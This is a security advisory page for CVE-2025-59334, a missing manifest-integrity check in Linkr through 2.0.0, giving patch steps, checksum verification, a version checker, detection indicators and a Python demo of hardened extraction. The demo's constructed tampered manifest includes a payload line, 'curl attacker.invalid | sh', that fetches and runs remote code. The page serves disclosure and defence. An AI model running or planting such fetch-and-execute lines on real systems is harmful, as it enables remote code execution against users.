CVE-2025-59334

9.6 CRITICAL

📋 TL;DR

Linkr versions through 2.0.0 fail to verify the integrity of .linkr manifest files, allowing attackers to inject malicious file entries into package distributions. When users extract files using a tampered manifest, the client downloads attacker-supplied files without verification, potentially leading to remote code execution. All users of Linkr versions ≤2.0.0 are affected.

💻 Affected Systems

Products:
  • Linkr
Versions: through 2.0.0
Operating Systems: all
Default Config Vulnerable: ⚠️ Yes
Notes: All installations using .linkr manifest files are vulnerable by default

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution via malicious binary/script execution leading to full system compromise

🟠

Likely Case

Arbitrary file injection and potential malware installation

🟢

If Mitigated

Failed downloads or warnings when integrity checks fail

🌐 Internet-Facing: HIGH - Attackers can host malicious manifests on public servers
🏢 Internal Only: MEDIUM - Requires internal attacker or compromised internal server

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires modifying manifest files and hosting malicious content

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.0.1

Vendor Advisory: https://github.com/mohammadzain2008/Linkr/security/advisories/GHSA-6wph-mpv2-29xv

Restart Required: No

Instructions:

1. Update Linkr to version 2.0.1 or later using your package manager or a manual installation.
2. Verify the update with 'linkr --version'.
3. Regenerate any existing .linkr manifests so that they include integrity checks.

🔧 Temporary Workarounds

Use only trusted manifests (all platforms)

Only download and use .linkr manifest files from trusted sources, and obtain the manifest's expected checksum through a channel the manifest server does not control (for example, the project's release page).

Manual manifest verification (all platforms)

Manually verify manifest integrity before extraction: compute the manifest's SHA-256 and compare it with the value published by the package author. The file name and the expected digest below are placeholders.

# Compute the manifest's checksum (use 'shasum -a 256' on macOS)
sha256sum package.linkr
# Compare against the publisher's value; 'sha256sum -c' exits non-zero on a mismatch
echo "<expected-sha256>  package.linkr" | sha256sum -c -
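The check that the workaround above asks for, shown as an added example written for this page rather than code from the Linkr project. The .linkr format used here (a JSON document with a list of file entries carrying a path, a download URL and the SHA-256 of the expected content) is an assumption, as are the URLs, the in-memory stand-in for the download server and the sample payloads. The first function reproduces the pattern the advisory describes for versions through 2.0.0 (trust every manifest entry and write whatever the URL returns); the second verifies the manifest against a digest pinned out of band and each downloaded blob against the digest the manifest declares, before anything is written.

```python
"""Added example (not Linkr's own code): manifest integrity checking of the
kind CVE-2025-59334 describes as missing in Linkr <= 2.0.0.

ASSUMPTION: a .linkr manifest is a JSON document with a "files" list whose
entries carry "path", "url" and "sha256". All URLs, payloads and the fake
download server below are constructed for illustration.
"""
import hashlib
import hmac
import json

# Constructed sample package content and manifest (assumed format).
GOOD_PAYLOAD = b"#!/bin/sh\necho hello\n"
GOOD_MANIFEST = json.dumps({
    "name": "demo-package",
    "version": "1.0.0",
    "files": [
        {"path": "bin/hello.sh",
         "url": "https://example.invalid/demo/hello.sh",
         "sha256": hashlib.sha256(GOOD_PAYLOAD).hexdigest()},
    ],
}, indent=2).encode()

# Digest of the trusted manifest, obtained out of band (e.g. from the
# publisher's release page) and compared with sha256sum by the user.
PINNED_MANIFEST_SHA256 = hashlib.sha256(GOOD_MANIFEST).hexdigest()

# Constructed stand-in for the download server, keyed by URL.
EVIL_URL = "https://attacker.invalid/evil.sh"
FAKE_SERVER = {
    "https://example.invalid/demo/hello.sh": GOOD_PAYLOAD,
    EVIL_URL: b"#!/bin/sh\ncurl attacker.invalid | sh\n",
}


def fetch(url: str) -> bytes:
    """Stand-in for an HTTP GET; raises KeyError for unknown URLs."""
    return FAKE_SERVER[url]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class IntegrityError(Exception):
    pass


def extract_unverified(manifest_bytes: bytes) -> dict:
    """Pattern the advisory describes for <= 2.0.0: every entry in the
    manifest is trusted and whatever the URL returns is accepted.
    Returns {path: content}."""
    manifest = json.loads(manifest_bytes)
    return {e["path"]: fetch(e["url"]) for e in manifest["files"]}


def extract_verified(manifest_bytes: bytes, pinned_sha256: str,
                     fetcher=fetch) -> dict:
    """Hardened form: (1) the manifest must match the out-of-band digest,
    (2) every downloaded blob must match the digest the manifest declares,
    and nothing is returned for writing until both checks pass."""
    if not hmac.compare_digest(sha256_hex(manifest_bytes), pinned_sha256):
        raise IntegrityError("manifest digest does not match pinned value")
    manifest = json.loads(manifest_bytes)
    staged = {}
    for entry in manifest["files"]:
        for key in ("path", "url", "sha256"):
            if key not in entry:
                raise IntegrityError(f"manifest entry missing {key!r}")
        blob = fetcher(entry["url"])
        if not hmac.compare_digest(sha256_hex(blob), entry["sha256"].lower()):
            raise IntegrityError(f"digest mismatch for {entry['path']}")
        staged[entry["path"]] = blob
    return staged


def tampered_manifest() -> bytes:
    """Constructed attacker manifest: the legitimate package plus one
    injected entry for attacker-hosted content. Note the entry carries a
    correct digest for the evil file, so per-entry digests alone cannot
    catch it; only the pinned manifest digest does."""
    manifest = json.loads(GOOD_MANIFEST)
    manifest["files"].append({
        "path": "bin/update.sh",
        "url": EVIL_URL,
        "sha256": sha256_hex(FAKE_SERVER[EVIL_URL]),
    })
    return json.dumps(manifest, indent=2).encode()


if __name__ == "__main__":
    print("unverified client writes:", sorted(extract_unverified(tampered_manifest())))
    try:
        extract_verified(tampered_manifest(), PINNED_MANIFEST_SHA256)
    except IntegrityError as exc:
        print("verified client rejects tampered manifest:", exc)
    print("verified client accepts:", sorted(extract_verified(GOOD_MANIFEST, PINNED_MANIFEST_SHA256)))
```

The two checks cover different attackers: the pinned manifest digest defeats someone who controls the manifest (who can of course write matching per-entry digests for their own files), while the per-entry digests defeat someone who controls only the download server and swaps a file after the manifest was published. Dropping either one leaves one of those attackers unhandled, which is why a regenerated manifest "with integrity checks" still has to be distributed alongside a digest or signature the user obtains separately.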

🧯 If You Can't Patch

  • Host manifests only on trusted, secure servers with access controls
  • Implement network monitoring for unexpected file downloads from untrusted sources

🔍 How to Verify

Check if Vulnerable:

Run 'linkr --version'; if the reported version is 2.0.0 or lower, the installation is vulnerable. Compare versions numerically (2.10.0 is newer than 2.0.1), not as strings.

Check Version:

linkr --version

Verify Fix Applied:

After updating, verify version is ≥2.0.1 and test manifest extraction with integrity checking
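A small helper for the version check described above, added here as example code rather than anything shipped with Linkr. The output format of 'linkr --version' is an assumption; the parser takes the first dotted version number it finds and compares it numerically against the fix version, which avoids the string-comparison mistake where "2.10.0" sorts before "2.0.1".

```python
"""Added example (not Linkr's own code): classify the installed Linkr build
against the affected range of CVE-2025-59334 (versions through 2.0.0,
fixed in 2.0.1). ASSUMPTION: 'linkr --version' prints a dotted version
somewhere in its output, e.g. "linkr 2.0.0" or "Linkr v2.0.1".
"""
import re
import subprocess

FIXED_VERSION = (2, 0, 1)
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> tuple:
    """Extract the first major.minor[.patch] number as an integer tuple."""
    match = VERSION_RE.search(text)
    if match is None:
        raise ValueError(f"no version number found in {text!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(version_text: str) -> bool:
    """True when the reported version is below the fixed release 2.0.1."""
    return parse_version(version_text) < FIXED_VERSION


def check_installed(cmd=("linkr", "--version")):
    """Run the version command and classify it; None if linkr is not on PATH."""
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    return is_vulnerable(proc.stdout + proc.stderr)


if __name__ == "__main__":
    result = check_installed()
    if result is None:
        print("linkr not found on PATH")
    else:
        print("VULNERABLE (<= 2.0.0)" if result else "patched (>= 2.0.1)")
```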

📡 Detection & Monitoring

Log Indicators:

  • Failed integrity checks in Linkr logs
  • Unexpected file downloads from untrusted URLs

Network Indicators:

  • Downloads from suspicious/unexpected URLs during Linkr extraction

SIEM Query:

process.name:'linkr' AND network.destination.ip:(suspicious_ip_list)

🔗 References
